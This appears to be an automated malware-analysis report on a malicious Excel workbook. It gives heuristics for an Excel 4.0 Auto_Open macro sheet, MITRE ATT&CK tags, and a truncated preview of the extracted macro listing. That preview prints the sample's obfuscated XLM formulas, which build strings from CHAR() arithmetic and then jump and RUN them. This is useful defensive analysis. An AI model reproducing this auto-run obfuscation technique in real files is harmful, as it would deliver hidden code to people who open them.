MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a common technique for executing malicious code upon opening the document. The macro uses numerous CHAR functions, suggesting it's constructing a string or command to be executed, likely a second-stage payload. The exact payload is not discernible due to truncation, but the intent is clearly malicious execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 127669 bytes |
SHA-256: 88b74ef99e91632f1f988ff58b7450e533ccd1eb2a0c62f75db0f290040639ee |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!T5303 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,HY83,"",0.80952380952380953438 ' Sheet,DL111,"FORMULA.FILL(CHAR(DW36276/J56493)&CHAR(EP35628*JT2261)&CHAR(FK52248-DY10735)&CHAR(JF54126-IB31475)&CHAR(EP35628*HQ29148)&CHAR(DW36276/GJ30914)&CHAR(IS31386+HH41454)&CHAR(FK52248+DM33061)&CHAR(HC18303*IN12873)&CHAR(IS31386-IT7631)&CHAR(JF54126/BF21296)&CHAR(S24662*DP11557)&CHAR(DW36276*GH42683)&CHAR(CE8942+GX31221)&CHAR(IS31386-BJ64464)&CHAR(DW36276*DK12719)&CHAR(EN64228*CU28833)&CHAR(HJ6079-JE36113)&CHAR(EP35628*DN27006)&CHAR(JF54126*IF6933)&CHAR(EN64228+M26475)&CHAR(S24662*BN205)&CHAR(JF54126/CQ37684)&CHAR(IS31386/IB61450)&CHAR(EP35628-BN1999)&CHAR(EP35628*FC24902)&CHAR(DW36276+A45145)&CHAR(S24662*GQ20683)&CHAR(JF54126-HP57189)&CHAR(EN64228+HM33128)&CHAR(EP35628*FJ40001)&CHAR(FK52248*S16729)&CHAR(JF54126+JQ60072)&CHAR(HC18303/GB34924)&CHAR(EP35628+EY46295)&CHAR(IS31386/FC48888)&CHAR(HJ6079/I63317)&CHAR(FK52248-EC30446)&CHAR(FK52248/W39761)&CHAR(CE8942*BH59302)&CHAR(CE8942/R33642)&CHAR(S24662/DF26476)&CHAR(DW36276-HP13467)&CHAR(EP35628-EO25077)&CHAR(S24662+BN15168)&CHAR(CE8942*FZ28973)&CHAR(EN64228-BG9357)&CHAR(DW36276+FH26578)&CHAR(HJ6079+BL11230)&CHAR(EN64228*GJ63409)&CHAR(HC18303+C18777)&CHAR(FK52248/E39529)&CHAR(S24662+CZ37604)&CHAR(EN64228-FH12372)&CHAR(HJ6079+FS45650)&CHAR(S24662-CH19442)&CHAR(DW36276/BP29644)&CHAR(IS31386*HM12893)&CHAR(EP35628+BB8397)&CHAR(S24662+CH50592)&CHAR(EN64228/CI9574)&CHAR(EN64228*Y6536)&CHAR(IS31386*GE45207)&CHAR(EN64228-IN54639)&CHAR(CE8942/JJ65479)&CHAR(S24662-GY33284)&CHAR(HC18303-IP10702)&CHAR(HC18303*FB56868)&CHAR(IS31386+W33076)&CHAR(DW36276*ER55472)&CHAR(HC18303*HW1265)&CHAR(EP35628+K65099)&CHAR(CE8942*FW40541)&CHAR(IS31386/FY7687)&CHAR(JF54126*GB8158)&CHAR(DW36276-BY11309)&CHAR(FK52248+GC27365)&CHAR(CE8942-FZ37644)&CHAR(CE8942*CS17616)&CHAR(HJ6079*FV42124)&CHAR(EP35628+IH13235)&CHAR(EN64228/HZ14720),DL112)","" ' Sheet,DL113,GOTO(DN8546),"" ' Sheet,HQ144,"",0.91397849462365587936 ' Sheet,CQ152,"",-0.80419580419580416475 ' Sheet,JG162,"",196.00000000000000000000 ' Sheet,BG178,"",0.76567656765676572750 ' Sheet,FV188,"",-431.00000000000000000000 ' Sheet,CL196,"",-47.75000000000000000000 ' Sheet,FB202,"",0.83955223880597018571 ' Sheet,BN205,"",0.37370242214532872760 ' Sheet,HQ308,"",-184.00000000000000000000 ' Sheet,GH349,"",17.50000000000000000000 ' Sheet,CH444,"",-1.19344162295081979153 ' Sheet,CW566,"",-19.50000000000000000000 ' Sheet,EE576,"",0.54117647058823525885 ' Sheet,EZ596,"",-458.00000000000000000000 ' Sheet,ID601,"",0.77227722772277229701 ' Sheet,EG607,"",130.00000000000000000000 ' Sheet,BA687,"",168.00000000000000000000 ' Sheet,EA727,"",-1165.00000000000000000000 ' Sheet,DJ745,"FORMULA.FILL(CHAR(EP35628/BW39382)&CHAR(CE8942-JQ38375)&CHAR(S24662/K38796)&CHAR(EN64228/HK37603)&CHAR(EP35628/HL42074)&CHAR(S24662*DI51523)&CHAR(EP35628*BR50046)&CHAR(IS31386+DE27685)&CHAR(FK52248*BM60145)&CHAR(DW36276+FP37215)&CHAR(FK52248+EX49480)&CHAR(CE8942-JF12465)&CHAR(EP35628-HA48997)&CHAR(EN64228/I22020)&CHAR(S24662-HW2869)&CHAR(DW36276-BV53674)&CHAR(DW36276+JP63939)&CHAR(HC18303/IB55954)&CHAR(JF54126*BT33912)&CHAR(FK52248-GO32363)&CHAR(FK52248-G18993)&CHAR(IS31386/IA18509)&CHAR(DW36276+EL43634)&CHAR(FK52248/J27334)&CHAR(JF54126/EF63526)&CHAR(EN64228-DS62304)&CHAR(S24662+Z34454)&CHAR(HC18303*FV62081)&CHAR(S24662*IV55265)&CHAR(JF54126-GP46906)&CHAR(HJ6079+CM14830)&CHAR(EP35628/L18417)&CHAR(EP35628-HM4140)&CHAR(HC18303-BN2604)&CHAR(HJ6079/FM31550)&CHAR(HC18303-IR23766)&CHAR(CE8942+FO32913)&CHAR(HJ6079/JM23052)&CHAR(S24662*DJ56893)&CHAR(IS31386+EH57509)&CHAR(HC18303-JI38213),BJ16364)","" ' Sheet,DJ746,RUN(II1937),"" ' Sheet,EW778,"",239.5 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.